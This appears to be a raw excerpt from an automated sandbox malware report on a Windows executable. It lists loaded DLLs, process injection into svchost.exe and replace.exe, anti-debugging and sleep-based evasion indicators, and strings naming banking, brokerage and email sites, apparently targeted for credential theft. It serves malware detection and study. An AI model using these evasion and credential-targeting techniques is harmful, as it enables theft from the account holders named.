            Source: C:\Users\user\Desktop\YSjOEAta07.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\YSjOEAta07.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\YSjOEAta07.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\YSjOEAta07.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\YSjOEAta07.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\YSjOEAta07.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\YSjOEAta07.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\YSjOEAta07.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\YSjOEAta07.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\YSjOEAta07.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\YSjOEAta07.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: ulib.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\YSjOEAta07.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\replace.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: YSjOEAta07.exeStatic file information: File size 1361945 > 1048576
            Source: Binary string: replace.pdb source: svchost.exe, 00000002.00000002.1488514641.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1455923509.000000000341A000.00000004.00000020.00020000.00000000.sdmp, GmuPchEfAM.exe, 00000003.00000002.3168342119.00000000006D7000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: replace.pdbGCTL source: svchost.exe, 00000002.00000002.1488514641.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1455923509.000000000341A000.00000004.00000020.00020000.00000000.sdmp, GmuPchEfAM.exe, 00000003.00000002.3168342119.00000000006D7000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: GmuPchEfAM.exe, 00000003.00000000.1411401209.00000000002BE000.00000002.00000001.01000000.00000004.sdmp, GmuPchEfAM.exe, 00000008.00000002.3167314647.00000000002BE000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: svchost.exe, 00000002.00000003.1389561003.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1387634356.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1488900482.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000004.00000003.1490226852.0000000000A3F000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000004.00000002.3170402090.0000000002C10000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000004.00000002.3170402090.0000000002DAE000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000004.00000003.1488017927.0000000000882000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: svchost.exe, svchost.exe, 00000002.00000003.1389561003.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1387634356.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1488900482.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, replace.exe, replace.exe, 00000004.00000003.1490226852.0000000000A3F000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000004.00000002.3170402090.0000000002C10000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000004.00000002.3170402090.0000000002DAE000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000004.00000003.1488017927.0000000000882000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: replace.exe, 00000004.00000002.3172177851.000000000323C000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.3167953756.00000000005E0000.00000004.00000020.00020000.00000000.sdmp, GmuPchEfAM.exe, 00000008.00000000.1558052270.0000000002CAC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.1780479653.00000000161AC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: replace.exe, 00000004.00000002.3172177851.000000000323C000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.3167953756.00000000005E0000.00000004.00000020.00020000.00000000.sdmp, GmuPchEfAM.exe, 00000008.00000000.1558052270.0000000002CAC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.1780479653.00000000161AC000.00000004.80000000.00040000.00000000.sdmp
            Source: YSjOEAta07.exeStatic PE information: real checksum: 0xa961f should be: 0x1562a3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042D853 push edi; iretd 2_2_0042D85C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00414079 pushfd ; iretw 2_2_004140C6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00418027 push ds; ret 2_2_00418028
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A036 push edi; ret 2_2_0041A03F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00414158 push edi; ret 2_2_00414159
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040D1BA push ss; retf 2_2_0040D1BB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040222C push ecx; retf 2_2_0040231F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041AA87 push edi; iretd 2_2_0041AA93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040D3DC push es; ret 2_2_0040D3E2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00415474 push edx; ret 2_2_00415475
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041543B push ebp; iretd 2_2_0041543C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004034A0 push eax; ret 2_2_004034A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00418D13 push edi; ret 2_2_00418D14
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00408682 push fs; iretd 2_2_00408684
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00413F43 pushfd ; iretw 2_2_004140C6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417F3A push ecx; retf 2_2_00417F3B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B309AD push ecx; mov dword ptr [esp], ecx2_2_03B309B6
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exeCode function: 3_2_0270BA77 push edi; ret 3_2_0270BA80
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exeCode function: 3_2_02709A68 push ds; ret 3_2_02709A69
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exeCode function: 3_2_0271F294 push edi; iretd 3_2_0271F29D
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exeCode function: 3_2_026FEBFB push ss; retf 3_2_026FEBFC
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exeCode function: 3_2_026FA0C3 push fs; iretd 3_2_026FA0C5
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exeCode function: 3_2_0270997B push ecx; retf 3_2_0270997C
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exeCode function: 3_2_02706E7C push ebp; iretd 3_2_02706E7D
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exeCode function: 3_2_026FEE1D push es; ret 3_2_026FEE23
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exeCode function: 3_2_02706EB5 push edx; ret 3_2_02706EB6
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exeCode function: 3_2_0270A754 push edi; ret 3_2_0270A755
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exeCode function: 3_2_0270C4C8 push edi; iretd 3_2_0270C4D4
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C409AD push ecx; mov dword ptr [esp], ecx4_2_02C409B6
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_001351DF push fs; iretd 4_2_001351E1
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_00150294 push 8DB602B4h; retf 4_2_0015029A
            Source: C:\Users\user\Desktop\YSjOEAta07.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\YSjOEAta07.exeAPI/Special instruction interceptor: Address: 410E25C
            Source: C:\Windows\SysWOW64\replace.exeAPI/Special instruction interceptor: Address: 7FF90818D324
            Source: C:\Windows\SysWOW64\replace.exeAPI/Special instruction interceptor: Address: 7FF90818D7E4
            Source: C:\Windows\SysWOW64\replace.exeAPI/Special instruction interceptor: Address: 7FF90818D944
            Source: C:\Windows\SysWOW64\replace.exeAPI/Special instruction interceptor: Address: 7FF90818D504
            Source: C:\Windows\SysWOW64\replace.exeAPI/Special instruction interceptor: Address: 7FF90818D544
            Source: C:\Windows\SysWOW64\replace.exeAPI/Special instruction interceptor: Address: 7FF90818D1E4
            Source: C:\Windows\SysWOW64\replace.exeAPI/Special instruction interceptor: Address: 7FF908190154
            Source: C:\Windows\SysWOW64\replace.exeAPI/Special instruction interceptor: Address: 7FF90818DA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041480C rdtsc 2_2_0041480C
            Source: C:\Windows\SysWOW64\replace.exeWindow / User API: threadDelayed 9844Jump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.8 %
            Source: C:\Windows\SysWOW64\replace.exeAPI coverage: 3.0 %
            Source: C:\Windows\SysWOW64\replace.exe TID: 8144Thread sleep count: 129 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\replace.exe TID: 8144Thread sleep time: -258000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\replace.exe TID: 8144Thread sleep count: 9844 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\replace.exe TID: 8144Thread sleep time: -19688000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe TID: 8184Thread sleep time: -55000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe TID: 8184Thread sleep time: -39000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\replace.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_0014C230 FindFirstFileW,FindNextFileW,FindClose,4_2_0014C230
            Source: 6U0173jM.4.drBinary or memory string: dev.azure.comVMware20,11696497155j
            Source: 6U0173jM.4.drBinary or memory string: global block list test formVMware20,11696497155
            Source: 6U0173jM.4.drBinary or memory string: turbotax.intuit.comVMware20,11696497155t
            Source: 6U0173jM.4.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
            Source: 6U0173jM.4.drBinary or memory string: Interactive Brokers - HKVMware20,11696497155]
            Source: 6U0173jM.4.drBinary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
            Source: 6U0173jM.4.drBinary or memory string: tasks.office.comVMware20,11696497155o
            Source: 6U0173jM.4.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155
            Source: 6U0173jM.4.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
            Source: replace.exe, 00000004.00000002.3167953756.00000000005E0000.00000004.00000020.00020000.00000000.sdmp, GmuPchEfAM.exe, 00000008.00000002.3168794274.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000009.00000002.1781965365.0000025A560AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: 6U0173jM.4.drBinary or memory string: bankofamerica.comVMware20,11696497155x
            Source: 6U0173jM.4.drBinary or memory string: ms.portal.azure.comVMware20,11696497155
            Source: 6U0173jM.4.drBinary or memory string: trackpan.utiitsl.comVMware20,11696497155h
            Source: 6U0173jM.4.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
            Source: 6U0173jM.4.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
            Source: 6U0173jM.4.drBinary or memory string: interactivebrokers.co.inVMware20,11696497155d
            Source: 6U0173jM.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696497155x
            Source: 6U0173jM.4.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696497155
            Source: 6U0173jM.4.drBinary or memory string: interactivebrokers.comVMware20,11696497155
            Source: 6U0173jM.4.drBinary or memory string: AMC password management pageVMware20,11696497155
            Source: 6U0173jM.4.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
            Source: 6U0173jM.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696497155}
            Source: 6U0173jM.4.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
            Source: 6U0173jM.4.drBinary or memory string: account.microsoft.com/profileVMware20,11696497155u
            Source: 6U0173jM.4.drBinary or memory string: discord.comVMware20,11696497155f
            Source: 6U0173jM.4.drBinary or memory string: netportal.hdfcbank.comVMware20,11696497155
            Source: 6U0173jM.4.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
            Source: 6U0173jM.4.drBinary or memory string: outlook.office365.comVMware20,11696497155t
            Source: 6U0173jM.4.drBinary or memory string: outlook.office.comVMware20,11696497155s
            Source: 6U0173jM.4.drBinary or memory string: www.interactivebrokers.comVMware20,11696497155}
            Source: 6U0173jM.4.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
            Source: 6U0173jM.4.drBinary or memory string: microsoft.visualstudio.comVMware20,11696497155x
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041480C rdtsc 2_2_0041480C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004175E3 LdrLoadDll,2_2_004175E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B533A5 mov eax, dword ptr fs:[00000030h]2_2_03B533A5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B633A0 mov eax, dword ptr fs:[00000030h]2_2_03B633A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B633A0 mov eax, dword ptr fs:[00000030h]2_2_03B633A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B8739A mov eax, dword ptr fs:[00000030h]2_2_03B8739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B8739A mov eax, dword ptr fs:[00000030h]2_2_03B8739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B28397 mov eax, dword ptr fs:[00000030h]2_2_03B28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B28397 mov eax, dword ptr fs:[00000030h]2_2_03B28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B28397 mov eax, dword ptr fs:[00000030h]2_2_03B28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2E388 mov eax, dword ptr fs:[00000030h]2_2_03B2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2E388 mov eax, dword ptr fs:[00000030h]2_2_03B2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2E388 mov eax, dword ptr fs:[00000030h]2_2_03B2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5438F mov eax, dword ptr fs:[00000030h]2_2_03B5438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5438F mov eax, dword ptr fs:[00000030h]2_2_03B5438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C053FC mov eax, dword ptr fs:[00000030h]2_2_03C053FC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E3F0 mov eax, dword ptr fs:[00000030h]2_2_03B4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E3F0 mov eax, dword ptr fs:[00000030h]2_2_03B4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E3F0 mov eax, dword ptr fs:[00000030h]2_2_03B4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B663FF mov eax, dword ptr fs:[00000030h]2_2_03B663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEF3E6 mov eax, dword ptr fs:[00000030h]2_2_03BEF3E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C0539D mov eax, dword ptr fs:[00000030h]2_2_03C0539D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]2_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]2_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]2_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]2_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]2_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]2_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]2_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]2_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEB3D0 mov ecx, dword ptr fs:[00000030h]2_2_03BEB3D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEC3CD mov eax, dword ptr fs:[00000030h]2_2_03BEC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03B3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03B3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03B3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03B3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03B3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03B3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B383C0 mov eax, dword ptr fs:[00000030h]2_2_03B383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B383C0 mov eax, dword ptr fs:[00000030h]2_2_03B383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B383C0 mov eax, dword ptr fs:[00000030h]2_2_03B383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B383C0 mov eax, dword ptr fs:[00000030h]2_2_03B383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C05341 mov eax, dword ptr fs:[00000030h]2_2_03C05341
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B27330 mov eax, dword ptr fs:[00000030h]2_2_03B27330
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF132D mov eax, dword ptr fs:[00000030h]2_2_03BF132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF132D mov eax, dword ptr fs:[00000030h]2_2_03BF132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5F32A mov eax, dword ptr fs:[00000030h]2_2_03B5F32A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2C310 mov ecx, dword ptr fs:[00000030h]2_2_03B2C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B50310 mov ecx, dword ptr fs:[00000030h]2_2_03B50310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB930B mov eax, dword ptr fs:[00000030h]2_2_03BB930B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB930B mov eax, dword ptr fs:[00000030h]2_2_03BB930B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB930B mov eax, dword ptr fs:[00000030h]2_2_03BB930B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A30B mov eax, dword ptr fs:[00000030h]2_2_03B6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A30B mov eax, dword ptr fs:[00000030h]2_2_03B6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A30B mov eax, dword ptr fs:[00000030h]2_2_03B6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD437C mov eax, dword ptr fs:[00000030h]2_2_03BD437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B37370 mov eax, dword ptr fs:[00000030h]2_2_03B37370
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B37370 mov eax, dword ptr fs:[00000030h]2_2_03B37370
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B37370 mov eax, dword ptr fs:[00000030h]2_2_03B37370
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEF367 mov eax, dword ptr fs:[00000030h]2_2_03BEF367
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B29353 mov eax, dword ptr fs:[00000030h]2_2_03B29353
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B29353 mov eax, dword ptr fs:[00000030h]2_2_03B29353
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB035C mov eax, dword ptr fs:[00000030h]2_2_03BB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB035C mov eax, dword ptr fs:[00000030h]2_2_03BB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB035C mov eax, dword ptr fs:[00000030h]2_2_03BB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB035C mov ecx, dword ptr fs:[00000030h]2_2_03BB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB035C mov eax, dword ptr fs:[00000030h]2_2_03BB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB035C mov eax, dword ptr fs:[00000030h]2_2_03BB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFA352 mov eax, dword ptr fs:[00000030h]2_2_03BFA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
